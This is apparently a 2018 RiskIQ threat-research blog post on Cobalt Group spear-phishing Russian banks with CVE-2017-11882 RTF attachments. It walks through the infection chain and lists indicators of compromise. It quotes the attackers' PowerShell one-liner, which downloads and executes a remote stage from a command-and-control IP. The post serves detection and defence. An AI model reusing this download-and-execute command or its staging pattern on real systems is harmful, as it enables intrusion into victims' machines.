# First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks **riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/** January 16, 2018 Labs January 16, 2018 By Yonathan Klijnsma Last year November, we [documented activities of the Cobalt Group using CVE-2017-11882. In December](https://www.riskiq.com/blog/labs/cobalt-strike/) they were already setting up for their next campaign. Today, on January 16th, the first wave of spear phishing emails were delivered to the inboxes of Russian banks. Sadly, this time around, the group didn’t [forget to BCC.](https://twitter.com/ydklijnsma/status/846766178093731840) The emails were sent in the name of a large European bank in an attempt to social engineer the receiver into trusting the email. The emails were quite plain with only a single question in the body and an [attachment with the name once.rtf. In other cases, we saw a file with the name](https://virustotal.com/en/file/8a57464c93d4f6d85e51e07748d4ffcc0b9e6b5a64642aec859040d1606fd0f8/analysis/) [u0417u0430u044fu0432u043bu0435u043du0438u0435.rtf attached to an email that was also written in](https://virustotal.com/en/file/8a57464c93d4f6d85e51e07748d4ffcc0b9e6b5a64642aec859040d1606fd0f8/analysis/) Russian: ----- The emails were sent from addresses on the domains bankosantantder.com and billing-cbr.ru, which were both set up for this campaign specifically. **Analysis** The attachment abuses CVE-2017-11882 to start PowerShell with the following command: _powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://46.21.147.61:80/a'))"_ This command downloads and executes a second stage, which is also a PowerShell script, but encoded: This script decodes to the third stage of the attack, another PowerShell script. This stage-three script is used to load a small piece of embedded shellcode into memory and run it like so: ----- The shellcode starts the Cobalt Strike stager in a new threat and starts it up. This stager will initiate connectivity with the C2 server to install the Cobalt Strike implant. **Infrastructure** [As shown, the stager beacons out to helpdesk-oracle.com, which was registered by a person using the](https://community.riskiq.com/search/helpdesk-oracle.com) [email address krystianwalczak@yandex.com. This email address pointed us to another domain, which was](https://community.riskiq.com/search/whois/email/krystianwalczak@yandex.com) registered on the same date and follows a similar pattern: [Right now, the server to which the domain help-desc-me.com points doesn’t seem to be active, nor have](https://community.riskiq.com/search/help-desc-me.com) we seen any malicious samples connect to it. We have marked it as malicious and listed it in the IOCs below, as we believe it will be part of either a next stage of the attack shown above or used in the next wave of spear phishing emails. **Indicators of Compromise (IOC)** All of the IOCs listed below are also available in the RiskIQ Community Public Project located here: [https://community.riskiq.com/projects/f0cd2fc9-a361-2a4c-4489-a21ddf98349b](https://community.riskiq.com/projects/f0cd2fc9-a361-2a4c-4489-a21ddf98349b) We have not added the hashes of the staging scripts because they do not appear on the system itself— they live in memory during the initial stages of the attack. **Filesystem IOCs** **Filename(s)** **Note** **MD5** 2e0cc6890fbf7a469d6c0ae70b5859e7 Once.rtf, u0417u0430u044fu0432u043bu0435u043du0438u0435.rtf CVE201711882 RTF ----- **Network IOCs** **Domain** **IP Address** **Note** bankosantantder.com 46.102.152.157 Sender domain billing-cbr.ru 85.204.74.117 Sender domain helpdesk-oracle.com 46.21.147.61 C2 server help-desc-me.com 139.60.163.10 Secondary C2 ## Subscribe to Our Newsletter Subscribe to the RiskIQ newsletter to stay up-to-date on our latest content, headlines, research, events, and more. Base Editor -----